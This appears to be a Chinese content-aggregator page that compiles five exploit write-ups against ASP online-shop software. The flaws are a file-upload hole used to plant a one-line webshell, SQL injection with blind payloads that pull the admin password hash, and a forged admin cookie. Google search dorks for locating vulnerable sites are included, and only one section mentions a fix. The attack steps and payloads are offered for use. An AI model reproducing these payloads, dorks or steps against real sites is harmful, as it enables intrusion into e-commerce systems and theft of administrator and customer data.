无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全

时间:2023-12-29 07:20:14 其他范文 收藏本文 下载本文

无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全(精选5篇)由网友“huangdichen”投稿提供,下面小编为大家整理后的无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全,希望能帮助大家!

无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全

篇1:无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全

关键字:Copyright © - gzwynet.com.cn

上传利用地址:admin/upLoad_c.asp?a=uploadfile&b=1

利用文件:

无忧购物系统ASP时尚版上传漏洞利用程序 BY Qing

www.hackqing.cn/admin/upLoad_c1.asp“

enctype=”multipart/form-data“ >

正在上传文件,请稍候...

bordercolorlight=”#cccccc“ bordercolordark=”#CCCCCC“ bgcolor=”#CCCCCC“>

文件上传 (允许上

传的文件类型: jpg gif)

选择文件:

nclick=”javascript.:mysub“>

上传一个JPG格式的小马或一句话

上传后的默认地址:admin/uploadfile/st.asp;(文件名)

如图

实际一句话地址:

利用文件:

无忧购物系统asp时尚版上传漏洞利用程序.html

down.qiannao.com/space/file/yulegu/share//10/1/-65e0-5fe7-8d2d-7269-7cfb-7edfasp-65f6-5c1a-7248-4e0a-4f20-6f0f-6d1e-5229-7528-7a0b-5e8f.html/.page

版本:无忧购物系统ASP通用版 V2010.9.17

漏洞:上传漏洞

关键字:Copyright©- gzwynet.com.cn (若有其他更好的关键字,希望能给我留下言)

利用前提:注册用户

漏洞文件:upfile_Other.asp

其中:

<%

if EnableUploadFile=”NO“ then

response.write ”系统未开放文件上传功能“

else

if session(”AdminName“)=”“ and session(”UserName“)=”“ then

response.Write(”请登录后再使用本功能!“)

else

select case upload_type

case 0

call upload_0() '使用化境无组件上传类

case else

'response.write ”本系统未开放插件功能“

'response.end

end select

end if

end if

%>

user,就是注册用户,也存在上传权限,其他的几个文件,如Upfile_Dialog.asp,Upfile_Photo.asp并没有普通用户的上传权限

那么我们现在就是要利用普通用户的这个可以上传的功能,

无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全

首先,注册个用户,如果没找到注册的地方,直接在网址后面输入userreg.asp,

注册并登录,

登录之后不要关闭页面,因为是session验证,现在我们打开这个本地上传页面,

修改action后的地址,并给马儿后面添加一个空格,点击上传就可以,图中红色所示部分就是空格,如图所示

复制页面上所示的木马地址,打开即可。

到此,拿到shell,完整结束。

附上本地上传的这个页面

down.qiannao.com/space/file/yulegu/share/2010/10/1/-672c-5730-4e0a-4f20-6f0f-6d1e.html/.page

篇2:网趣网上购物系统时尚版 v3.2注入漏洞

Cool Kid 's blog

涉及版本:网趣网上购物系统时尚版 v3.2

漏洞文件:getpwd2.asp,getpwd3.asp,getpwd4.asp

漏洞描述:变量username未经过滤带入sql查询,存在SQL注入漏洞.

关键代码:

ASP代码

<%

username=request.form(”username“)

set rs=Server.CreateObject(”Adodb.Recordset“)

sql=”select * from [user] where username='“&username”' “

rs.open sql,conn,1,1

If rs.eof Then

%>

<%

End If

%>

取回密码 | 回答问题

利用方法:

post提交数据(可以借用剑心的Sql.htm[www.loveshell.net/blog/blogview.asp?logID=70]),默认管理员ID为4,密码为16位md5(小写字母),确定下范围0-9的asc值48-57,小写字母的asc值97-122

SQL代码

' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 48 and 57)0 and ''='

' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 97 and 122)0 and ''='

正确返回”取回密码“,错误返回对话框”这个用户没有注册,请注册!“

篇3:网趣网上购物系统时尚版10.3注入漏洞及修复

网趣可以改名成洞趣了

网趣网上购物系统时尚版10.3在会员登录编辑订单处存在SQL注入,导致管理员密码被注入暴MD5漏洞,

漏洞:文件editorderform.asp,存在sql注入漏洞

关键字:inurl:trends.asp?id=

利用前提:注册用户下定单

分析:

源码如下:

<%dim zhuangtai,namekey

namekey=trim(request(”namekey“))     只是单单过滤了空格而已

zhuangtai=trim(request(”zhuangtai“))

if zhuangtai=”“ then zhuangtai=request.QueryString(”zhuangtai“)

if namekey=”“ then namekey=request.querystring(”namekey“)

%>

………………

//按用户查询

if zhuangtai=0 or zhuangtai=”“ then

rs.open ”select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai<6 and username=“&namekey&” order by actiondate desc“,conn,1,1

else

rs.open ”select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai=“&zhuangtai&” and username=“&namekey&” order by actiondate“,conn,1,1

end if

admin目录下的editorderform.asp文件未做session验证,且对namekey过滤不严,直接导入查询产生SQL注入漏洞,

利用如下:

首先注册一个用户,随便找一样东西购买下一个定单,产生一个定单号。

如图:

好了,定单号产生,那么,我们接着就直接打开网站

www.chinasg.tk/admin/editorderform.asp?zhuangtai=0&namekey=qing

其中的namekey=qing,qing替换成你注册的用户名,

把这个URL放到NBSI当中,关键字为“1笔”,手动添加表名cnhww,结果如图所示:

好了,拿着跑出来的密码去cmd5解一下,再登录后台,

后台拿shell的话,备份和上传那里都可以,我就不详说了。

修复方案:

对admin目录下的editorderform.asp文件做session验证,对namekey严格过滤

篇4:网趣网上购物系统时尚版10.3注入漏洞漏洞预警

网趣网上购物系统时尚版10.3在会员登录编辑订单处存在SQL注入,导致管理员密码被注入暴MD5漏洞,

漏洞:文件editorderform.asp,存在sql注入漏洞

关键字:inurl:trends.asp?id=

利用前提:注册用户下定单

分析:

源码如下:

<%dim zhuangtai,namekey

namekey=trim(request(”namekey“))     只是单单过滤了空格而已

zhuangtai=trim(request(”zhuangtai“))

if zhuangtai=”“ then zhuangtai=request.QueryString(”zhuangtai“)

if namekey=”“ then namekey=request.querystring(”namekey“)

%>

………………

'//按用户查询

if zhuangtai=0 or zhuangtai=”“ then

rs.open ”select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai<6 and username='“&namekey&”' order by actiondate desc“,conn,1,1

else

rs.open ”select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai=“&zhuangtai&” and username='“&namekey&”' order by actiondate“,conn,1,1

end if

admin目录下的editorderform.asp文件未做session验证,且对namekey过滤不严,直接导入查询产生SQL注入漏洞,

利用如下:

首先注册一个用户,随便找一样东西购买下一个定单,产生一个定单号。

如图:

好了,定单号产生,那么,我们接着就直接打开网站

www.chinasg.tk/admin/editorderform.asp?zhuangtai=0&namekey=qing

其中的namekey=qing,qing替换成你注册的用户名,

把这个URL放到NBSI当中,关键字为“1笔”,手动添加表名cnhww,结果如图所示:

好了,拿着跑出来的密码去cmd5解一下,再登录后台,

后台拿shell的话,备份和上传那里都可以,我就不详说了。

篇5:凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用

ad_chk.asp判断管理员登陆状态

<%

if Request.Cookies(”venshop“)(”admin_name“)=”“ or Request.Cookies(”venshop“)(”admin_pass“)=”“ or Request.Cookies(”venshop“)(”admin_class“)=”“ then

Response.Cookies(”venshop“)(”admin_name“)=”“

Response.Cookies(”venshop“)(”admin_pass“)=”“

Response.Cookies(”venshop“)(”admin_class“)=”“

response.redirect ”ad_login.asp“

response.end

end if

%>

判断admin_class

C:\Inetpub\wwwroot>findstr /i /n /s ”admin_class“ *.asp

ad_admin.asp:29: rs(”admin_class“)=request(”class1“)

ad_admin.asp:43:rs(”admin_class“)=request(”class“)

ad_admin.asp:92:<%if rs(”admin_class“)=0 then response.write” s

elected“%>>总管理员

ad_admin.asp:93:<%if rs(”admin_class“)=1 then response.write” s

elected“%>>产品管理

ad_admin.asp:94:<%if rs(”admin_class“)=2 then response.write” s

elected“%>>订单管理

........................

可以看出当admin_class=0的时候就是总管理员身份了,

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用

伪造cookie如下

Themes=default; Count=lao=3; Countecho=lao=True; ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin

然后访问即可,后台有数据库备份可以拿webshell。

google :inurl:”views.asp?hw_id="

写网站设计开题报告

旅游网站策划书

电子商务的网站策划书

电子商务网站的策划书

渗透荆门市的门户网站网站安全

上传漏洞终结篇讲解

商城年终总结

入侵搜索关键字

旅游网站系统的设计开题

ideacms文章管理系统漏洞及修复

无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全
《无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全(精选5篇)】相关文章:

扩展思维新方法后台拿shell2022-05-06

网站策划书2022-11-28

瑞星个人防火墙修复Windows系统漏洞教程2023-05-29

网上购物系统项目计划书2023-04-07

网站建设实训心得体会2023-08-09

教你做服务级的木马后门2023-07-09

网站推广策划书2022-08-19

网络层安全服务与攻击分析2023-12-10

网站建设策划书2023-02-22

电子商务网站建设策划书2022-09-17

点击下载本文文档